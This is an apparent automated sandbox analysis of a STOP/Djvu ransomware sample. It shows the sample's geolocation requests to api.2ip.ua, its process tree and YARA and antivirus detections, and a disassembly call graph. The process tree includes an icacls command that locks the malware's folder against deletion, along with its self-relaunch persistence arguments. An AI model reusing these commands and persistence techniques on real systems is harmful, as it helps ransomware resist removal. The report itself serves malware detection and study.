                                                                                                      2024-02-12 00:35:58 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449735104.21.65.244435644C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-12 00:36:10 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:36:10 UTC889INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:36:10 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJDManXkGzNbIsKVO2LreVujoxcFdqB51da3MalAS5gVcnsxuYmC%2B8Ieui3a%2B7bMUd%2FiUmJVmQw9rG92iM43SZYlGrc6r316W2lpBOOQ8QS6aQxQOSf0iRyCjcdj"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c17c2c576753-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-02-12 00:36:10 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:36:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449742104.21.65.244435104C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-12 00:36:16 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:36:17 UTC887INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:36:17 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8rrIyL%2BjGAlZG%2B2DAz2BxpDdWyXwuYyYfTaxA5tiuw85ANLYfiorCUh9LF4KPvGEwrsk4a7fadlI9gkOHW82Ho5z0gPm0ped5p0BPvZ33Z0FkzbMOffjLEaY6Fql"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c1a4c9e1b0b5-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-02-12 00:36:17 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:36:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:01:35:52
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Imagebase:0xf10000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:01:35:53
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                      Imagebase:0xb00000
                                                                                                      File size:29'696 bytes
                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:01:35:54
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                      Imagebase:0xf10000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1641298642.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:01:35:56
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe --Task
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: unknown
                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: ditekSHen
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 87%, ReversingLabs
                                                                                                      • Detection: 79%, Virustotal, Browse
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:01:36:07
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1771858243.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000000.1771375510.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1800921924.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:01:36:15
                                                                                                      Start date:12/02/2024
                                                                                                      Path:C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
                                                                                                      Imagebase:0xf00000
                                                                                                      File size:1'150'976 bytes
                                                                                                      MD5 hash:1AAB5A9252E93871932CD7381693E199
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1853038508.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1865701923.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:37.3%
                                                                                                        Total number of Nodes:806
                                                                                                        Total number of Limit Nodes:91
                                                                                                        execution_graph 38403 f33f84 38404 f33f90 __wsopen_helper 38403->38404 38440 f42603 GetStartupInfoW 38404->38440 38407 f33fed 38409 f33ff8 38407->38409 38772 f3411a 58 API calls 3 library calls 38407->38772 38408 f33f95 38442 f378d5 GetProcessHeap 38408->38442 38443 f35141 38409->38443 38412 f33ffe 38413 f34009 __RTC_Initialize 38412->38413 38773 f3411a 58 API calls 3 library calls 38412->38773 38464 f38754 38413->38464 38416 f34018 38417 f34024 GetCommandLineW 38416->38417 38774 f3411a 58 API calls 3 library calls 38416->38774 38483 f4235f GetEnvironmentStringsW 38417->38483 38420 f34023 38420->38417 38423 f3403e 38424 f34049 38423->38424 38775 f37c2e 58 API calls 3 library calls 38423->38775 38493 f421a1 38424->38493 38428 f3405a 38507 f37c68 38428->38507 38431 f34062 38433 f3406d __wwincmdln 38431->38433 38777 f37c2e 58 API calls 3 library calls 38431->38777 38513 f29f90 38433->38513 38435 f34081 38436 f34090 38435->38436 38769 f37f3d 38435->38769 38778 f37c59 58 API calls _doexit 38436->38778 38439 f34095 __wsopen_helper 38441 f42619 38440->38441 38441->38408 38442->38407 38779 f37d6c 36 API calls 2 library calls 38443->38779 38445 f35146 38780 f38c48 InitializeCriticalSectionAndSpinCount __getstream 38445->38780 38447 f3514b 38448 f3514f 38447->38448 38782 f424f7 TlsAlloc 38447->38782 38781 f351b7 61 API calls 2 library calls 38448->38781 38451 f35154 38451->38412 38452 f35161 38452->38448 38453 f3516c 38452->38453 38783 f38c96 38453->38783 38456 f351ae 38791 f351b7 61 API calls 2 library calls 38456->38791 38459 f351b3 38459->38412 38460 f3518d 38460->38456 38461 f35193 38460->38461 38790 f3508e 58 API calls 4 library calls 38461->38790 38463 f3519b GetCurrentThreadId 38463->38412 38465 f38760 __wsopen_helper 38464->38465 38803 f38af7 38465->38803 38467 f38767 38468 f38c96 __calloc_crt 58 API calls 38467->38468 38471 f38778 38468->38471 38469 f38783 __wsopen_helper @_EH4_CallFilterFunc@8 38469->38416 38470 f387e3 GetStartupInfoW 38476 f387f8 38470->38476 38478 f38927 38470->38478 38471->38469 38471->38470 38472 f389ef 38812 f389ff LeaveCriticalSection _doexit 38472->38812 38474 f38c96 __calloc_crt 58 API calls 38474->38476 38475 f38974 GetStdHandle 38475->38478 38476->38474 38476->38478 38480 f38846 38476->38480 38477 f38987 GetFileType 38477->38478 38478->38472 38478->38475 38478->38477 38811 f4263e InitializeCriticalSectionAndSpinCount 38478->38811 38479 f3887a GetFileType 38479->38480 38480->38478 38480->38479 38810 f4263e InitializeCriticalSectionAndSpinCount 38480->38810 38484 f34034 38483->38484 38485 f42370 38483->38485 38489 f41f64 GetModuleFileNameW 38484->38489 38815 f38cde 58 API calls 2 library calls 38485->38815 38487 f42396 __expandlocale 38488 f423ac FreeEnvironmentStringsW 38487->38488 38488->38484 38490 f41f98 _wparse_cmdline 38489->38490 38492 f41fd8 _wparse_cmdline 38490->38492 38816 f38cde 58 API calls 2 library calls 38490->38816 38492->38423 38494 f3404f 38493->38494 38495 f421ba _GetLocaleNameFromDefault 38493->38495 38494->38428 38776 f37c2e 58 API calls 3 library calls 38494->38776 38496 f38c96 __calloc_crt 58 API calls 38495->38496 38497 f421e3 _GetLocaleNameFromDefault 38496->38497 38497->38494 38499 f4223a 38497->38499 38500 f38c96 __calloc_crt 58 API calls 38497->38500 38501 f4225f 38497->38501 38504 f42276 38497->38504 38817 f3962f 58 API calls __mbsnbicoll_l 38497->38817 38818 f30bed 58 API calls 2 library calls 38499->38818 38500->38497 38819 f30bed 58 API calls 2 library calls 38501->38819 38820 f342fd 8 API calls 2 library calls 38504->38820 38506 f42282 38510 f37c74 __IsNonwritableInCurrentImage 38507->38510 38509 f37c92 __initterm_e 38512 f37cb1 __cinit __IsNonwritableInCurrentImage 38509->38512 38824 f319ac 67 API calls __cinit 38509->38824 38821 f4aeb5 38510->38821 38512->38431 38514 f29fa0 __write_nolock 38513->38514 38825 f1cf10 38514->38825 38516 f29fb0 38517 f29fc4 GetCurrentProcess GetLastError SetPriorityClass 38516->38517 38518 f29fb4 38516->38518 38520 f29fe6 38517->38520 38521 f29fe4 GetLastError 38517->38521 39049 f224e0 109 API calls _memset 38518->39049 38839 f2d3c0 38520->38839 38521->38520 38522 f29fb9 38522->38435 38525 f2a022 38842 f2d340 38525->38842 38526 f2b669 39148 f5f23e 59 API calls 2 library calls 38526->39148 38528 f2b673 39149 f5f23e 59 API calls 2 library calls 38528->39149 38533 f2a065 38847 f23a90 38533->38847 38537 f2a159 GetCommandLineW CommandLineToArgvW lstrcpyW 38539 f2a33d GlobalFree 38537->38539 38553 f2a196 38537->38553 38538 f2a100 38538->38537 38540 f2a354 38539->38540 38541 f2a45c 38539->38541 38542 f22220 76 API calls 38540->38542 38903 f22220 38541->38903 38544 f2a359 38542->38544 38546 f2a466 38544->38546 38918 f1ef50 38544->38918 38545 f2a1cc lstrcmpW lstrcmpW 38545->38553 38546->38435 38548 f2a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38548->38553 38549 f2a48f 38549->38549 38551 f2a4ef 38549->38551 38923 f23ea0 38549->38923 38554 f21cd0 92 API calls 38551->38554 38552 f30235 60 API calls ___get_qualified_locale 38552->38553 38553->38539 38553->38545 38553->38548 38553->38552 38555 f2a361 38553->38555 38557 f2a563 38554->38557 38863 f33c92 38555->38863 38589 f2a5db 38557->38589 38944 f24690 38557->38944 38559 f2a395 OpenProcess 38560 f2a402 38559->38560 38561 f2a3a9 WaitForSingleObject CloseHandle 38559->38561 38866 f21cd0 38560->38866 38561->38560 38565 f2a3cb 38561->38565 38562 f2a6f9 39051 f21a10 8 API calls 38562->39051 38581 f2a3e2 GlobalFree 38565->38581 38582 f2a3d4 Sleep 38565->38582 39050 f21ab0 PeekMessageW DispatchMessageW PeekMessageW 38565->39050 38566 f2a6fe 38570 f2a8b6 CreateMutexA 38566->38570 38571 f2a70f 38566->38571 38567 f2a5a9 38573 f24690 59 API calls 38567->38573 38569 f2a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38574 f2a451 38569->38574 38576 f2a8ca 38570->38576 38575 f2a7dc 38571->38575 38585 f1ef50 58 API calls 38571->38585 38578 f2a5d4 38573->38578 38574->38435 38583 f1ef50 58 API calls 38575->38583 38580 f1ef50 58 API calls 38576->38580 38577 f2a624 GetVersion 38577->38562 38584 f2a632 lstrcpyW lstrcatW lstrcatW 38577->38584 38967 f1d240 CoInitialize 38578->38967 38593 f2a8da 38580->38593 38586 f2a3f7 38581->38586 38582->38559 38587 f2a7ec 38583->38587 38588 f2a674 _memset 38584->38588 38596 f2a72f 38585->38596 38586->38435 38590 f2a7f1 lstrlenA 38587->38590 38592 f2a6b4 ShellExecuteExW 38588->38592 38589->38562 38589->38566 38589->38570 38589->38577 39053 f30c62 38590->39053 38592->38566 38613 f2a6e3 38592->38613 38595 f23ea0 59 API calls 38593->38595 38609 f2a92f 38593->38609 38594 f2a810 _memset 38597 f2a81e MultiByteToWideChar lstrcatW 38594->38597 38595->38593 38598 f23ea0 59 API calls 38596->38598 38602 f2a780 38596->38602 38597->38590 38599 f2a847 lstrlenW 38597->38599 38598->38596 38600 f2a8a0 CreateMutexA 38599->38600 38601 f2a856 38599->38601 38600->38576 39071 f1e760 95 API calls 38601->39071 38604 f2a792 38602->38604 38605 f2a79c CreateThread 38602->38605 39052 f23ff0 59 API calls __expandlocale 38604->39052 38605->38575 38608 f2a7d0 38605->38608 39453 f2dbd0 95 API calls 4 library calls 38605->39453 38606 f2a860 CreateThread WaitForSingleObject 38606->38600 39454 f2e690 185 API calls 8 library calls 38606->39454 38608->38575 39072 f25c10 38609->39072 38611 f2a98c 39087 f22840 60 API calls 38611->39087 38613->38435 38614 f2a997 39088 f20fc0 93 API calls 4 library calls 38614->39088 38616 f2a9ab 38617 f2a9c2 lstrlenA 38616->38617 38617->38613 38618 f2a9d8 38617->38618 38619 f25c10 59 API calls 38618->38619 38620 f2aa23 38619->38620 39089 f22840 60 API calls 38620->39089 38622 f2aa2e lstrcpyA 38624 f2aa4b 38622->38624 38625 f25c10 59 API calls 38624->38625 38626 f2aa90 38625->38626 38627 f1ef50 58 API calls 38626->38627 38628 f2aaa0 38627->38628 38629 f23ea0 59 API calls 38628->38629 38630 f2aaf5 38628->38630 38629->38628 39090 f23ff0 59 API calls __expandlocale 38630->39090 38632 f2ab1d 39091 f22900 38632->39091 38634 f2ab28 _memmove 38635 f1ef50 58 API calls 38634->38635 38636 f2abc5 38635->38636 